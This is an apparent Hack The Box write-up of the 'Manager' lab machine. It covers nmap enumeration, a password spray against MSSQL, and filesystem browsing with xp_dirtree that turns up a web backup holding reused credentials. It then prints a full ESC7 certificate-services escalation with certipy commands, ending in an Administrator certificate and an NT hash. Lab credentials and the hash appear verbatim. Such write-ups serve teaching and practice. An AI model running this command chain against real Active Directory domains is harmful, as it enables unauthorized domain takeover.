Manager is a medium difficulty Windows machine which hosts an Active Directory environment with AD CS (Active Directory Certificate Services), a web server, and an SQL server. The foothold involves enumerating users using RID cycling and performing a password spray attack to gain access to the MSSQL service. The xp_dirtree procedure is then used to explore the filesystem, uncovering a website backup in the web-root. Extracting the backup reveals credentials that are reused to WinRM to the server. Finally, the attacker escalates privileges through AD CS via ESC7 exploitation.
Enumeration
Nmap Scan
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Manager]
└──╼ $ nmap -p- --min-rate 10000 $ip -Pn -oN Nmap/all-ports-scan
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
1433/tcp open ms-sql-s
5985/tcp open wsman
49693/tcp open unknown
49782/tcp open unknown
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Manager]
└──╼ $ nmap -p53,80,88,135,139,389,445,1433,5985 -sCV $ip -oN Nmap/script-scan
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Manager
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-03 01:37:39Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.manager.htb
| Not valid before: 2024-08-30T17:08:51
|_Not valid after: 2122-07-27T10:31:04
|_ssl-date: 2024-11-03T01:38:28+00:00; +7h00m00s from scanner time.
445/tcp open microsoft-ds?
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-11-01T19:35:12
|_Not valid after: 2054-11-01T19:35:12
|_ssl-date: 2024-11-03T01:38:28+00:00; +7h00m01s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Manager]
└──╼ $ sudo nmap -sU -p1-10000 --min-rate 10000 $ip -Pn
PORT STATE SERVICE
53/udp open domain
88/udp open kerberos-sec
123/udp open ntp
389/udp open ldap
Summary
* Open ports: 53,80,88,135,139,389,445,1433,5985
* UDP open ports: 53,88,123,389
* Services: DNS - HTTP - KERBEROS - RPC - SMB - MSSQL -winRM
* Important notes: Domain: manager.htb - DNS:dc01.manager.htb
Since I don't have any password yet, I will try to brute the password as the user's name and I get a hit
I can brute MSSQL login, too
With valid credentials, I will look at the shared access and MSSQL database. When I looked at the share, I didn't get interesting things here so will move to mssql
And I'm in the database :))
When I deal with mssql, I perform checklist for possible attack paths, So I will create one
Check for admin Access
Check the databases for juicy info and secrets
Check the possibility capture the mssql service account
Check for impersonating other users
Check for trustworthy database
Check for Linked Server
Check for Read or Write Access to the file system
Check for executing commands with xp_cmdshell
With this List, I can move forward and I will use mssqlclient.py built-in commands
SQL> SELECT IS_SRVROLEMEMBER('sysadmin')
-----------
0
SQL (MANAGER\Operator guest@master)> enum_db
name is_trustworthy_on
------ -----------------
master 0
tempdb 0
model 0
msdb 1
SQL (MANAGER\Operator guest@master)> enum_owner
Database Owner
-------- -----
master sa
tempdb sa
model sa
msdb sa
SQL (MANAGER\Operator guest@master)> enum_links
SRV_NAME SRV_PROVIDERNAME SRV_PRODUCT SRV_DATASOURCE SRV_PROVIDERSTRING SRV_LOCATION SRV_CAT
--------------- ---------------- ----------- --------------- ------------------ ------------ -------
DC01\SQLEXPRESS SQLNCLI SQL Server DC01\SQLEXPRESS NULL NULL NULL
SQL (MANAGER\Operator guest@master)> enum_impersonate
execute as database permission_name state_desc grantee grantor
---------- -------- --------------- ---------- ------- -------
Till now, I don't get any possible path and when I even tried to get the hash of the service account, I got the hash of the machine account which is uncrackable
The last thing I can try is check read or write access to the file system. I will use xp_dirtree to list the directories in a path.
Lateral Movement
With IIS web server running on the box, I can try to read web.config or an important file on its directory inetpub. Here are several interesting files web.config & website-backup-27-07-23-old.zip
When I tried to access the web.config trough web, it gave me file not found.
but when I tried to access the .zip file, It was downloaded
I created a new directory, moved the zip file to it, unzipped it and list the content. there is an odd .xml file
When dealing with ADCS, I hurry to enumerate possible ESCALATION (ESC) paths using certipy
Then, I will also use certipy to find vunerable templates or permissions
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Manager/website-backup]
└──╼ $certipy find -u raven -p 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.10.11.236 -vulnerable -stdout
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Trying to get CA configuration for 'manager-DC01-CA' via CSRA
[*] Got CA configuration for 'manager-DC01-CA'
[*] Enumeration output:
Certificate Authorities
0
CA Name : manager-DC01-CA
DNS Name : dc01.manager.htb
Certificate Subject : CN=manager-DC01-CA, DC=manager, DC=htb
Certificate Serial Number : 5150CE6EC048749448C7390A52F264BB
Certificate Validity Start : 2023-07-27 10:21:05+00:00
Certificate Validity End : 2122-07-27 10:31:04+00:00
Web Enrollment : Disabled
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Permissions
Owner : MANAGER.HTB\Administrators
Access Rights
Enroll : MANAGER.HTB\Operator
MANAGER.HTB\Authenticated Users
MANAGER.HTB\Raven
ManageCertificates : MANAGER.HTB\Administrators
MANAGER.HTB\Domain Admins
MANAGER.HTB\Enterprise Admins
ManageCa : MANAGER.HTB\Administrators
MANAGER.HTB\Domain Admins
MANAGER.HTB\Enterprise Admins
MANAGER.HTB\Raven
[!] Vulnerabilities
ESC7 : 'MANAGER.HTB\\Raven' has dangerous permissions
user raven has Enroll and ManageCA rights which means he can enroll new certificate and edit permission on any template, So I can make it vulnerable to ESC4
The built-in SubCA template is also enabled (as it is by default). This template is vulnerable to ESC1 but only permits Domain Admins and Enterprise Admins to enroll.
The certificate is present and enabled (Enabled: True). If the SubCA certificate is disabled we should enable it.
Since we have ManageCA rights, we can assign ManageCertificate rights to any account.
Exploitation Path
Enable SubCA template
Grant ManageCertificate rights
Request certificate for SubCA template impersonating administrator
Approve the enrollment request as raven
Access the machine as an administrator
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Manager/website-backup]
└──╼ $certipy ca -u raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' -ca manager-DC01-CA -enable-template 'SubCA'
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Successfully enabled 'SubCA' on 'manager-DC01-CA'
Grant ManageCertificate rights
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Manager/website-backup]
└──╼ $certipy ca -u raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' -ca manager-DC01-CA -add-officer raven
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Successfully added officer 'Raven' on 'manager-DC01-CA'
With the SubCA template enabled and with ManageCertificates rights, we can request a certificate by adding an alternative SAN and selecting the SubCA template.
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Manager/website-backup]
└──╼ $certipy req -u raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' -ca manager-DC01-CA -template SubCA -upn Administrator
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[-] Got error while trying to request certificate: code: 0x80094012 - CERTSRV_E_TEMPLATE_DENIED - The permissions on the certificate template do not allow the current user to enroll for this type of certificate.
[*] Request ID is 20
Would you like to save the private key? (y/N) y
[*] Saved private key to 20.key
[-] Failed to request certificate
We need to save the requested ID 20, and respond yes to the question: Would you like to save the private key? (y/N). We will need this private key to retrieve the certificate later.
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Manager/website-backup]
└──╼ $certipy ca -u raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' -ca manager-DC01-CA -issue-request 20
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Successfully issued certificate
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Manager/website-backup]
└──╼ $certipy req -u raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' -ca manager-DC01-CA -retrieve 20
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Rerieving certificate with ID 20
[*] Successfully retrieved certificate
[*] Got certificate with UPN 'Administrator'
[*] Certificate has no object SID
[*] Loaded private key from '20.key'
[*] Saved certificate and private key to 'administrator.pfx'
Now I can authenticate as an administrator with the .pfx file
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Manager/website-backup]
└──╼ $certipy auth -pfx administrator.pfx -domain manager.htb
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@manager.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@manager.htb': aad3b435b51404eeaad3b435b51404ee:ae5064c2f62317332c88629e025924ef
